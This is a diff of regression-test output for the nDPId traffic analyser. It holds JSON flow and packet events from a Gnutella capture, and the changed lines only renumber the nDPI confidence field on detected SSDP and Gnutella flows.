00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":64717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZlAAIAG6a0KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q8tAAIAGVuYKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} @@ -189,12 +189,12 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":65063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65063,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWpAAIAG8s4KAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":65065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADS4KkAAAER3GgKAAIP7\/\/\/+uEXB2wAvizBTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToyDQpNWDogMw0KDQo="} -00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":65065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADS4KoAAAER3GcKAAIP7\/\/\/+uEXB2wAvi3BTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNWDogMw0KDQo="} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":65065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADN4KsAAAER3GsKAAIP7\/\/\/+uEXB2wAuZDETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5JUENvbm5lY3Rpb246Mg0KTVg6IDMNCg0K"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":65240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":65240,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAp8AAEAGUxwOxwo8CgACD1uixCMAa2wB\/Z82JWAS\/\/+zDQAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":65241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":65241,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSFFAAIAGjW0KAAIPDscKPMQjW6L9nzYlAGtsAlAQ+vDP2QAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":65062,"flow_last_seen":65241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":65241,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":65062,"flow_last_seen":65241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":65241,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xttAAIAGndgKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1tAAIAGzIQKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq1AAIAGH9UKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} @@ -248,7 +248,7 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":68170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68170,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0k7pAAIAGcS8KAAIPJOnE4sQsDuwTBJqfAAAAAIAC+vD9iAAAAgQFtAEDAwgBAQQC"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":68368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":68368,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAqgAAEAGVIJ08aKiCgACDz09xDIAcUgB9bSpG2AS\/\/+LwQAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":68368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68368,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobmNAAIAGaMoKAAIPdPGiosQyPT31tKkbAHFIAlAQ+vCojQAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":68108,"flow_last_seen":68372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":68372,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":68108,"flow_last_seen":68372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":68372,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":68425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68425,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqoAAP8GHcZv8R9gCgACDzgwxDQAAAAAU1SN+lAUAAA2vQAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":68935,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68935,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KIpAAIAGNtoKAAIPb\/EfYMQ0ODBTVI35AAAAAIAC+vD7DAAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdpAAIAGUVsKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} @@ -271,17 +271,17 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lydAAIAGNGMKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":69169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69169,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAq8AAEAGhyBdHYfRCgACDxjKxDwAczwBOuMML2AS\/\/9GjAAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":69169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69169,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZ6tAAIAGoicKAAIPXR2H0cQ8GMo64wwvAHM8AlAQ+vBjWAAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":69174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":69174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":69182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69182,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArEAAEAGyG4tWHZGCgACDxr6xDsAdDYBRmqi+GAS\/\/\/pWwAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":69182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69182,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoAgRAAIAGSR8KAAIPLVh2RsQ7GvpGaqL4AHQ2AlAQ+vAGKAAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":69182,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":69182,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArgAAEAG3qdZSzQTCgACD7O6xBEAXroBd2GZhGAS\/\/+7lwAAAgQFtA=="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArkAAEAG56stQVcYCgACDz9JxBAAXcABhPHErWAS\/\/\/6VgAAAgQFtA=="} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAroAAEAG+PjPJqPkCgACDxp6xA8AYK4B6qFHeGAS\/\/9Z9wAAAgQFtA=="} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArsAAEAG2+NQjD+TCgACD3NpxA4AX7QBeWsMs2AS\/\/+J8QAAAgQFtA=="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArwAAEAGwoS2m\/LhCgACDzrcxDgAdioBOrzIf2AS\/\/+1wgAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69360,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLcFAAIAGF4MKAAIPtpvy4cQ4Otw6vMh\/AHYqAlAQ+vDSjgAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69141,"flow_last_seen":69361,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":69361,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69141,"flow_last_seen":69361,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":69361,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtFAAIAGDgYKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faJAAIAGiKUKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R01AAIAGN+QKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} @@ -324,10 +324,10 @@ 